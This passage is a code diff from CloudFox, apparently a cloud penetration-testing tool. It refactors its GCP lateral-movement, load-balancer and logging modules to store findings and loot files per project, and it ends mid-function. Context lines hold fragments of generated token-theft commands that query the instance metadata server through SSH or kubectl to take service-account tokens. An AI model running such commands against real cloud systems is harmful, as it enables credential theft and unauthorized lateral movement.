@@ -96,34 +96,52 @@ func runGCPLateralMovementCommand(cmd *cobra.Command, args []string) { } module := &LateralMovementModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - ImpersonationChains: []ImpersonationChain{}, - TokenTheftVectors: []TokenTheftVector{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectImpersonationChains: make(map[string][]ImpersonationChain), + ProjectTokenTheftVectors: make(map[string][]TokenTheftVector), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } // ------------------------------ // Module Execution // ------------------------------ +func (m *LateralMovementModule) getAllImpersonationChains() []ImpersonationChain { + var all []ImpersonationChain + for _, chains := range m.ProjectImpersonationChains { + all = append(all, chains...) + } + return all +} + +func (m *LateralMovementModule) getAllTokenTheftVectors() []TokenTheftVector { + var all []TokenTheftVector + for _, vectors := range m.ProjectTokenTheftVectors { + all = append(all, vectors...) + } + return all +} + func (m *LateralMovementModule) Execute(ctx context.Context, logger internal.Logger) { logger.InfoM("Mapping lateral movement paths...", GCP_LATERALMOVEMENT_MODULE_NAME) // Process each project m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_LATERALMOVEMENT_MODULE_NAME, m.processProject) + allChains := m.getAllImpersonationChains() + allVectors := m.getAllTokenTheftVectors() + // Check results - totalPaths := len(m.ImpersonationChains) + len(m.TokenTheftVectors) + totalPaths := len(allChains) + len(allVectors) if totalPaths == 0 { logger.InfoM("No lateral movement paths found", GCP_LATERALMOVEMENT_MODULE_NAME) return } logger.SuccessM(fmt.Sprintf("Found %d lateral movement path(s): %d impersonation chains, %d token theft vectors", - totalPaths, len(m.ImpersonationChains), len(m.TokenTheftVectors)), GCP_LATERALMOVEMENT_MODULE_NAME) + totalPaths, len(allChains), len(allVectors)), GCP_LATERALMOVEMENT_MODULE_NAME) m.writeOutput(ctx, logger) } @@ -131,11 +149,29 @@ func (m *LateralMovementModule) Execute(ctx context.Context, logger internal.Log // ------------------------------ // Project Processor // ------------------------------ +func (m *LateralMovementModule) initializeLootForProject(projectID string) { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["impersonation-chains-commands"] = &internal.LootFile{ + Name: "impersonation-chains-commands", + Contents: "# Impersonation Chain Exploit Commands\n# Generated by CloudFox\n\n", + } + m.LootMap[projectID]["token-theft-commands"] = &internal.LootFile{ + Name: "token-theft-commands", + Contents: "# Token Theft Exploit Commands\n# Generated by CloudFox\n\n", + } + } +} + func (m *LateralMovementModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Analyzing lateral movement paths in project: %s", projectID), GCP_LATERALMOVEMENT_MODULE_NAME) } + m.mu.Lock() + m.initializeLootForProject(projectID) + m.mu.Unlock() + // 1. Find impersonation chains m.findImpersonationChains(ctx, projectID, logger) @@ -185,7 +221,7 @@ func (m *LateralMovementModule) findImpersonationChains(ctx context.Context, pro } m.mu.Lock() - m.ImpersonationChains = append(m.ImpersonationChains, chain) + m.ProjectImpersonationChains[projectID] = append(m.ProjectImpersonationChains[projectID], chain) m.addImpersonationChainToLoot(chain, projectID) m.mu.Unlock() } @@ -206,7 +242,7 @@ func (m *LateralMovementModule) findImpersonationChains(ctx context.Context, pro } m.mu.Lock() - m.ImpersonationChains = append(m.ImpersonationChains, chain) + m.ProjectImpersonationChains[projectID] = append(m.ProjectImpersonationChains[projectID], chain) m.addImpersonationChainToLoot(chain, projectID) m.mu.Unlock() } @@ -267,8 +303,8 @@ gcloud compute ssh %s --zone=%s --project=%s --command='curl -s -H "Metadata-Fla } m.mu.Lock() - m.TokenTheftVectors = append(m.TokenTheftVectors, vector) - m.addTokenTheftVectorToLoot(vector) + m.ProjectTokenTheftVectors[projectID] = append(m.ProjectTokenTheftVectors[projectID], vector) + m.addTokenTheftVectorToLoot(projectID, vector) m.mu.Unlock() } } @@ -363,8 +399,8 @@ gcloud functions delete token-theft-poc --region=%s --project=%s --quiet`, } m.mu.Lock() - m.TokenTheftVectors = append(m.TokenTheftVectors, vector) - m.addTokenTheftVectorToLoot(vector) + m.ProjectTokenTheftVectors[projectID] = append(m.ProjectTokenTheftVectors[projectID], vector) + m.addTokenTheftVectorToLoot(projectID, vector) m.mu.Unlock() } } @@ -476,8 +512,8 @@ gcloud container images delete gcr.io/%s/token-theft-poc --quiet --force-delete- } m.mu.Lock() - m.TokenTheftVectors = append(m.TokenTheftVectors, vector) - m.addTokenTheftVectorToLoot(vector) + m.ProjectTokenTheftVectors[projectID] = append(m.ProjectTokenTheftVectors[projectID], vector) + m.addTokenTheftVectorToLoot(projectID, vector) m.mu.Unlock() } } @@ -530,8 +566,8 @@ kubectl exec -it -- curl -s -H "Metadata-Flavor: Google" "http://metadata. } m.mu.Lock() - m.TokenTheftVectors = append(m.TokenTheftVectors, vector) - m.addTokenTheftVectorToLoot(vector) + m.ProjectTokenTheftVectors[projectID] = append(m.ProjectTokenTheftVectors[projectID], vector) + m.addTokenTheftVectorToLoot(projectID, vector) m.mu.Unlock() } } @@ -559,8 +595,8 @@ gcloud container clusters get-credentials %s --location=%s --project=%s } m.mu.Lock() - m.TokenTheftVectors = append(m.TokenTheftVectors, vector) - m.addTokenTheftVectorToLoot(vector) + m.ProjectTokenTheftVectors[projectID] = append(m.ProjectTokenTheftVectors[projectID], vector) + m.addTokenTheftVectorToLoot(projectID, vector) m.mu.Unlock() } } @@ -568,19 +604,12 @@ gcloud container clusters get-credentials %s --location=%s --project=%s // ------------------------------ // Loot File Management // ------------------------------ -func (m *LateralMovementModule) initializeLootFiles() { - m.LootMap["impersonation-chains-commands"] = &internal.LootFile{ - Name: "impersonation-chains-commands", - Contents: "# Impersonation Chain Exploit Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["token-theft-commands"] = &internal.LootFile{ - Name: "token-theft-commands", - Contents: "# Token Theft Exploit Commands\n# Generated by CloudFox\n\n", - } -} - func (m *LateralMovementModule) addImpersonationChainToLoot(chain ImpersonationChain, projectID string) { - m.LootMap["impersonation-chains-commands"].Contents += fmt.Sprintf( + lootFile := m.LootMap[projectID]["impersonation-chains-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( "# Impersonation: %s -> %s\n"+ "# Path: %s\n"+ "%s\n\n", @@ -591,8 +620,12 @@ func (m *LateralMovementModule) addImpersonationChainToLoot(chain ImpersonationC ) } -func (m *LateralMovementModule) addTokenTheftVectorToLoot(vector TokenTheftVector) { - m.LootMap["token-theft-commands"].Contents += fmt.Sprintf( +func (m *LateralMovementModule) addTokenTheftVectorToLoot(projectID string, vector TokenTheftVector) { + lootFile := m.LootMap[projectID]["token-theft-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( "# Token Theft: %s (%s)\n"+ "# Project: %s\n"+ "# Service Account: %s\n"+ @@ -611,44 +644,54 @@ func (m *LateralMovementModule) addTokenTheftVectorToLoot(vector TokenTheftVecto // Output Generation // ------------------------------ func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Impersonation chains table - // Reads: Source identity can perform action on target service account - chainsHeader := []string{ + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *LateralMovementModule) getChainsHeader() []string { + return []string{ "Source Identity", "Action", "Target Service Account", "Impersonation Path", } +} - var chainsBody [][]string - for _, chain := range m.ImpersonationChains { - // Determine action based on exploit command +func (m *LateralMovementModule) getVectorsHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Source Resource Type", + "Source Resource Name", + "Action", + "Target Service Account", + } +} + +func (m *LateralMovementModule) chainsToTableBody(chains []ImpersonationChain) [][]string { + var body [][]string + for _, chain := range chains { action := "Impersonate (Get Token)" if strings.Contains(chain.ExploitCommand, "keys create") { action = "Create Key" } - chainsBody = append(chainsBody, []string{ + body = append(body, []string{ chain.StartIdentity, action, chain.TargetSA, strings.Join(chain.Path, " -> "), }) } + return body +} - // Token theft vectors table - vectorsHeader := []string{ - "Project Name", - "Project ID", - "Source Resource Type", - "Source Resource Name", - "Action", - "Target Service Account", - } - - var vectorsBody [][]string - for _, vector := range m.TokenTheftVectors { - // Map attack vector to action description (Title Case) +func (m *LateralMovementModule) vectorsToTableBody(vectors []TokenTheftVector) [][]string { + var body [][]string + for _, vector := range vectors { action := vector.AttackVector switch vector.AttackVector { case "metadata_server": @@ -661,7 +704,7 @@ func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal action = "Steal Token (Pod)" } - vectorsBody = append(vectorsBody, []string{ + body = append(body, []string{ m.GetProjectName(vector.ProjectID), vector.ProjectID, vector.ResourceType, @@ -670,47 +713,112 @@ func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal vector.ServiceAccount, }) } + return body +} - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) +func (m *LateralMovementModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if chains, ok := m.ProjectImpersonationChains[projectID]; ok && len(chains) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "lateral-impersonation-chains", + Header: m.getChainsHeader(), + Body: m.chainsToTableBody(chains), + }) + } + + if vectors, ok := m.ProjectTokenTheftVectors[projectID]; ok && len(vectors) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "lateral-token-theft", + Header: m.getVectorsHeader(), + Body: m.vectorsToTableBody(vectors), + }) + } + + return tableFiles +} + +func (m *LateralMovementModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectImpersonationChains { + projectIDs[projectID] = true + } + for projectID := range m.ProjectTokenTheftVectors { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } + + outputData.ProjectLevelData[projectID] = LateralMovementOutput{Table: tableFiles, Loot: lootFiles} } - // Build tables + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_LATERALMOVEMENT_MODULE_NAME) + } +} + +func (m *LateralMovementModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allChains := m.getAllImpersonationChains() + allVectors := m.getAllTokenTheftVectors() + tables := []internal.TableFile{} - if len(chainsBody) > 0 { + if len(allChains) > 0 { tables = append(tables, internal.TableFile{ Name: "lateral-impersonation-chains", - Header: chainsHeader, - Body: chainsBody, + Header: m.getChainsHeader(), + Body: m.chainsToTableBody(allChains), }) - logger.InfoM(fmt.Sprintf("[PENTEST] Found %d impersonation chain(s)", len(chainsBody)), GCP_LATERALMOVEMENT_MODULE_NAME) + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d impersonation chain(s)", len(allChains)), GCP_LATERALMOVEMENT_MODULE_NAME) } - if len(vectorsBody) > 0 { + if len(allVectors) > 0 { tables = append(tables, internal.TableFile{ Name: "lateral-token-theft", - Header: vectorsHeader, - Body: vectorsBody, + Header: m.getVectorsHeader(), + Body: m.vectorsToTableBody(allVectors), }) } + // Collect loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + output := LateralMovementOutput{ Table: tables, Loot: lootFiles, } - // Build scopeNames using GetProjectName scopeNames := make([]string, len(m.ProjectIDs)) for i, projectID := range m.ProjectIDs { scopeNames[i] = m.GetProjectName(projectID) } - // Write output err := internal.HandleOutputSmart( "gcp", m.Format, diff --git a/gcp/commands/loadbalancers.go b/gcp/commands/loadbalancers.go index aba9f74f..f1ca9381 100644 --- a/gcp/commands/loadbalancers.go +++ b/gcp/commands/loadbalancers.go @@ -30,11 +30,11 @@ Features: type LoadBalancersModule struct { gcpinternal.BaseGCPModule - LoadBalancers []loadbalancerservice.LoadBalancerInfo - SSLPolicies []loadbalancerservice.SSLPolicyInfo - BackendServices []loadbalancerservice.BackendServiceInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectLoadBalancers map[string][]loadbalancerservice.LoadBalancerInfo // projectID -> load balancers + ProjectSSLPolicies map[string][]loadbalancerservice.SSLPolicyInfo // projectID -> SSL policies + ProjectBackendServices map[string][]loadbalancerservice.BackendServiceInfo // projectID -> backend services + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } type LoadBalancersOutput struct { @@ -52,36 +52,63 @@ func runGCPLoadBalancersCommand(cmd *cobra.Command, args []string) { } module := &LoadBalancersModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - LoadBalancers: []loadbalancerservice.LoadBalancerInfo{}, - SSLPolicies: []loadbalancerservice.SSLPolicyInfo{}, - BackendServices: []loadbalancerservice.BackendServiceInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectLoadBalancers: make(map[string][]loadbalancerservice.LoadBalancerInfo), + ProjectSSLPolicies: make(map[string][]loadbalancerservice.SSLPolicyInfo), + ProjectBackendServices: make(map[string][]loadbalancerservice.BackendServiceInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } func (m *LoadBalancersModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOADBALANCERS_MODULE_NAME, m.processProject) - if len(m.LoadBalancers) == 0 { + allLoadBalancers := m.getAllLoadBalancers() + allSSLPolicies := m.getAllSSLPolicies() + allBackendServices := m.getAllBackendServices() + + if len(allLoadBalancers) == 0 { logger.InfoM("No load balancers found", globals.GCP_LOADBALANCERS_MODULE_NAME) return } externalCount := 0 - for _, lb := range m.LoadBalancers { + for _, lb := range allLoadBalancers { if lb.Scheme == "EXTERNAL" { externalCount++ } } logger.SuccessM(fmt.Sprintf("Found %d load balancer(s) (%d external), %d SSL policies, %d backend services", - len(m.LoadBalancers), externalCount, len(m.SSLPolicies), len(m.BackendServices)), globals.GCP_LOADBALANCERS_MODULE_NAME) + len(allLoadBalancers), externalCount, len(allSSLPolicies), len(allBackendServices)), globals.GCP_LOADBALANCERS_MODULE_NAME) m.writeOutput(ctx, logger) } +func (m *LoadBalancersModule) getAllLoadBalancers() []loadbalancerservice.LoadBalancerInfo { + var all []loadbalancerservice.LoadBalancerInfo + for _, lbs := range m.ProjectLoadBalancers { + all = append(all, lbs...) + } + return all +} + +func (m *LoadBalancersModule) getAllSSLPolicies() []loadbalancerservice.SSLPolicyInfo { + var all []loadbalancerservice.SSLPolicyInfo + for _, policies := range m.ProjectSSLPolicies { + all = append(all, policies...) + } + return all +} + +func (m *LoadBalancersModule) getAllBackendServices() []loadbalancerservice.BackendServiceInfo { + var all []loadbalancerservice.BackendServiceInfo + for _, services := range m.ProjectBackendServices { + all = append(all, services...) + } + return all +} + func (m *LoadBalancersModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Enumerating load balancers in project: %s", projectID), globals.GCP_LOADBALANCERS_MODULE_NAME) @@ -89,6 +116,17 @@ func (m *LoadBalancersModule) processProject(ctx context.Context, projectID stri svc := loadbalancerservice.New() + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["loadbalancers-commands"] = &internal.LootFile{ + Name: "loadbalancers-commands", + Contents: "# Load Balancer Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + // Get load balancers lbs, err := svc.ListLoadBalancers(projectID) if err != nil { @@ -97,7 +135,10 @@ func (m *LoadBalancersModule) processProject(ctx context.Context, projectID stri fmt.Sprintf("Could not list load balancers in project %s", projectID)) } else { m.mu.Lock() - m.LoadBalancers = append(m.LoadBalancers, lbs...) + m.ProjectLoadBalancers[projectID] = lbs + for _, lb := range lbs { + m.addToLoot(projectID, lb) + } m.mu.Unlock() } @@ -105,7 +146,7 @@ func (m *LoadBalancersModule) processProject(ctx context.Context, projectID stri sslPolicies, err := svc.ListSSLPolicies(projectID) if err == nil { m.mu.Lock() - m.SSLPolicies = append(m.SSLPolicies, sslPolicies...) + m.ProjectSSLPolicies[projectID] = sslPolicies m.mu.Unlock() } @@ -113,38 +154,29 @@ func (m *LoadBalancersModule) processProject(ctx context.Context, projectID stri backends, err := svc.ListBackendServices(projectID) if err == nil { m.mu.Lock() - m.BackendServices = append(m.BackendServices, backends...) + m.ProjectBackendServices[projectID] = backends m.mu.Unlock() } - - m.mu.Lock() - for _, lb := range lbs { - m.addToLoot(lb) - } - m.mu.Unlock() } -func (m *LoadBalancersModule) initializeLootFiles() { - m.LootMap["loadbalancers-commands"] = &internal.LootFile{ - Name: "loadbalancers-commands", - Contents: "# Load Balancer Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *LoadBalancersModule) addToLoot(projectID string, lb loadbalancerservice.LoadBalancerInfo) { + lootFile := m.LootMap[projectID]["loadbalancers-commands"] + if lootFile == nil { + return } -} - -func (m *LoadBalancersModule) addToLoot(lb loadbalancerservice.LoadBalancerInfo) { - m.LootMap["loadbalancers-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## Load Balancer: %s (Project: %s)\n"+ "# Type: %s, Scheme: %s, IP: %s, Port: %s\n\n", lb.Name, lb.ProjectID, lb.Type, lb.Scheme, lb.IPAddress, lb.Port) // Describe forwarding rule if lb.Region == "global" { - m.LootMap["loadbalancers-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Describe global forwarding rule:\n"+ "gcloud compute forwarding-rules describe %s --global --project=%s\n\n", lb.Name, lb.ProjectID) } else { - m.LootMap["loadbalancers-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Describe regional forwarding rule:\n"+ "gcloud compute forwarding-rules describe %s --region=%s --project=%s\n\n", lb.Name, lb.Region, lb.ProjectID) @@ -152,7 +184,7 @@ func (m *LoadBalancersModule) addToLoot(lb loadbalancerservice.LoadBalancerInfo) // Backend service commands for _, backend := range lb.BackendServices { - m.LootMap["loadbalancers-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Describe backend service:\n"+ "gcloud compute backend-services describe %s --global --project=%s\n\n", backend, lb.ProjectID) @@ -160,12 +192,28 @@ func (m *LoadBalancersModule) addToLoot(lb loadbalancerservice.LoadBalancerInfo) } func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.Logger) { - var tables []internal.TableFile + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *LoadBalancersModule) getLBHeader() []string { + return []string{"Project Name", "Project ID", "Name", "Type", "Scheme", "Region", "IP Address", "Port", "Backend Services", "Security Policy"} +} - // Load Balancers table - lbHeader := []string{"Project Name", "Project ID", "Name", "Type", "Scheme", "Region", "IP Address", "Port", "Backend Services", "Security Policy"} - var lbBody [][]string - for _, lb := range m.LoadBalancers { +func (m *LoadBalancersModule) getSSLHeader() []string { + return []string{"Project Name", "Project ID", "Name", "Min TLS Version", "Profile", "Custom Features"} +} + +func (m *LoadBalancersModule) getBackendHeader() []string { + return []string{"Project Name", "Project ID", "Name", "Protocol", "Port", "Security Policy", "CDN Enabled", "Health Check", "Session Affinity", "Backends"} +} + +func (m *LoadBalancersModule) lbsToTableBody(lbs []loadbalancerservice.LoadBalancerInfo) [][]string { + var body [][]string + for _, lb := range lbs { backends := "-" if len(lb.BackendServices) > 0 { backends = strings.Join(lb.BackendServices, ", ") @@ -174,7 +222,7 @@ func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.L if lb.SecurityPolicy != "" { secPolicy = lb.SecurityPolicy } - lbBody = append(lbBody, []string{ + body = append(body, []string{ m.GetProjectName(lb.ProjectID), lb.ProjectID, lb.Name, @@ -187,82 +235,171 @@ func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.L secPolicy, }) } - tables = append(tables, internal.TableFile{ - Name: "load-balancers", - Header: lbHeader, - Body: lbBody, - }) - - // SSL Policies table - if len(m.SSLPolicies) > 0 { - sslHeader := []string{"Project Name", "Project ID", "Name", "Min TLS Version", "Profile", "Custom Features"} - var sslBody [][]string - for _, policy := range m.SSLPolicies { - customFeatures := "-" - if len(policy.CustomFeatures) > 0 { - customFeatures = strings.Join(policy.CustomFeatures, ", ") - } - sslBody = append(sslBody, []string{ - m.GetProjectName(policy.ProjectID), - policy.ProjectID, - policy.Name, - policy.MinTLSVersion, - policy.Profile, - customFeatures, - }) + return body +} + +func (m *LoadBalancersModule) sslPoliciesToTableBody(policies []loadbalancerservice.SSLPolicyInfo) [][]string { + var body [][]string + for _, policy := range policies { + customFeatures := "-" + if len(policy.CustomFeatures) > 0 { + customFeatures = strings.Join(policy.CustomFeatures, ", ") } - tables = append(tables, internal.TableFile{ + body = append(body, []string{ + m.GetProjectName(policy.ProjectID), + policy.ProjectID, + policy.Name, + policy.MinTLSVersion, + policy.Profile, + customFeatures, + }) + } + return body +} + +func (m *LoadBalancersModule) backendServicesToTableBody(services []loadbalancerservice.BackendServiceInfo) [][]string { + var body [][]string + for _, be := range services { + secPolicy := "-" + if be.SecurityPolicy != "" { + secPolicy = be.SecurityPolicy + } + healthCheck := "-" + if be.HealthCheck != "" { + healthCheck = be.HealthCheck + } + sessionAffinity := "-" + if be.SessionAffinity != "" { + sessionAffinity = be.SessionAffinity + } + backends := "-" + if len(be.Backends) > 0 { + backends = strings.Join(be.Backends, ", ") + } + body = append(body, []string{ + m.GetProjectName(be.ProjectID), + be.ProjectID, + be.Name, + be.Protocol, + fmt.Sprintf("%d", be.Port), + secPolicy, + boolToYesNo(be.EnableCDN), + healthCheck, + sessionAffinity, + backends, + }) + } + return body +} + +func (m *LoadBalancersModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if lbs, ok := m.ProjectLoadBalancers[projectID]; ok && len(lbs) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "load-balancers", + Header: m.getLBHeader(), + Body: m.lbsToTableBody(lbs), + }) + } + + if policies, ok := m.ProjectSSLPolicies[projectID]; ok && len(policies) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ Name: "ssl-policies", - Header: sslHeader, - Body: sslBody, + Header: m.getSSLHeader(), + Body: m.sslPoliciesToTableBody(policies), }) } - // Backend Services table - if len(m.BackendServices) > 0 { - beHeader := []string{"Project Name", "Project ID", "Name", "Protocol", "Port", "Security Policy", "CDN Enabled", "Health Check", "Session Affinity", "Backends"} - var beBody [][]string - for _, be := range m.BackendServices { - secPolicy := "-" - if be.SecurityPolicy != "" { - secPolicy = be.SecurityPolicy - } - healthCheck := "-" - if be.HealthCheck != "" { - healthCheck = be.HealthCheck - } - sessionAffinity := "-" - if be.SessionAffinity != "" { - sessionAffinity = be.SessionAffinity - } - backends := "-" - if len(be.Backends) > 0 { - backends = strings.Join(be.Backends, ", ") + if services, ok := m.ProjectBackendServices[projectID]; ok && len(services) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "backend-services", + Header: m.getBackendHeader(), + Body: m.backendServicesToTableBody(services), + }) + } + + return tableFiles +} + +func (m *LoadBalancersModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectLoadBalancers { + projectIDs[projectID] = true + } + for projectID := range m.ProjectSSLPolicies { + projectIDs[projectID] = true + } + for projectID := range m.ProjectBackendServices { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } } - beBody = append(beBody, []string{ - m.GetProjectName(be.ProjectID), - be.ProjectID, - be.Name, - be.Protocol, - fmt.Sprintf("%d", be.Port), - secPolicy, - boolToYesNo(be.EnableCDN), - healthCheck, - sessionAffinity, - backends, - }) } + + outputData.ProjectLevelData[projectID] = LoadBalancersOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_LOADBALANCERS_MODULE_NAME) + } +} + +func (m *LoadBalancersModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allLBs := m.getAllLoadBalancers() + allSSL := m.getAllSSLPolicies() + allBackends := m.getAllBackendServices() + + var tables []internal.TableFile + + if len(allLBs) > 0 { + tables = append(tables, internal.TableFile{ + Name: "load-balancers", + Header: m.getLBHeader(), + Body: m.lbsToTableBody(allLBs), + }) + } + + if len(allSSL) > 0 { + tables = append(tables, internal.TableFile{ + Name: "ssl-policies", + Header: m.getSSLHeader(), + Body: m.sslPoliciesToTableBody(allSSL), + }) + } + + if len(allBackends) > 0 { tables = append(tables, internal.TableFile{ Name: "backend-services", - Header: beHeader, - Body: beBody, + Header: m.getBackendHeader(), + Body: m.backendServicesToTableBody(allBackends), }) } var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } } } diff --git a/gcp/commands/logging.go b/gcp/commands/logging.go index c89c9f6f..aa8f9571 100644 --- a/gcp/commands/logging.go +++ b/gcp/commands/logging.go @@ -47,10 +47,10 @@ Attack Surface: type LoggingModule struct { gcpinternal.BaseGCPModule - Sinks []LoggingService.SinkInfo - Metrics []LoggingService.MetricInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectSinks map[string][]LoggingService.SinkInfo // projectID -> sinks + ProjectMetrics map[string][]LoggingService.MetricInfo // projectID -> metrics + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex } // ------------------------------ @@ -74,13 +74,12 @@ func runGCPLoggingCommand(cmd *cobra.Command, args []string) { } module := &LoggingModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Sinks: []LoggingService.SinkInfo{}, - Metrics: []LoggingService.MetricInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectSinks: make(map[string][]LoggingService.SinkInfo), + ProjectMetrics: make(map[string][]LoggingService.MetricInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -90,7 +89,10 @@ func runGCPLoggingCommand(cmd *cobra.Command, args []string) { func (m *LoggingModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOGGING_MODULE_NAME, m.processProject) - if len(m.Sinks) == 0 && len(m.Metrics) == 0 { + allSinks := m.getAllSinks() + allMetrics := m.getAllMetrics() + + if len(allSinks) == 0 && len(allMetrics) == 0 { logger.InfoM("No logging sinks or metrics found", globals.GCP_LOGGING_MODULE_NAME) return } @@ -98,7 +100,7 @@ func (m *LoggingModule) Execute(ctx context.Context, logger internal.Logger) { // Count interesting sinks crossProjectCount := 0 disabledCount := 0 - for _, sink := range m.Sinks { + for _, sink := range allSinks { if sink.IsCrossProject { crossProjectCount++ } @@ -107,7 +109,7 @@ func (m *LoggingModule) Execute(ctx context.Context, logger internal.Logger) { } } - msg := fmt.Sprintf("Found %d sink(s), %d metric(s)", len(m.Sinks), len(m.Metrics)) + msg := fmt.Sprintf("Found %d sink(s), %d metric(s)", len(allSinks), len(allMetrics)) if crossProjectCount > 0 { msg += fmt.Sprintf(" [%d cross-project]", crossProjectCount) } @@ -119,6 +121,24 @@ func (m *LoggingModule) Execute(ctx context.Context, logger internal.Logger) { m.writeOutput(ctx, logger) } +// getAllSinks returns all sinks from all projects +func (m *LoggingModule) 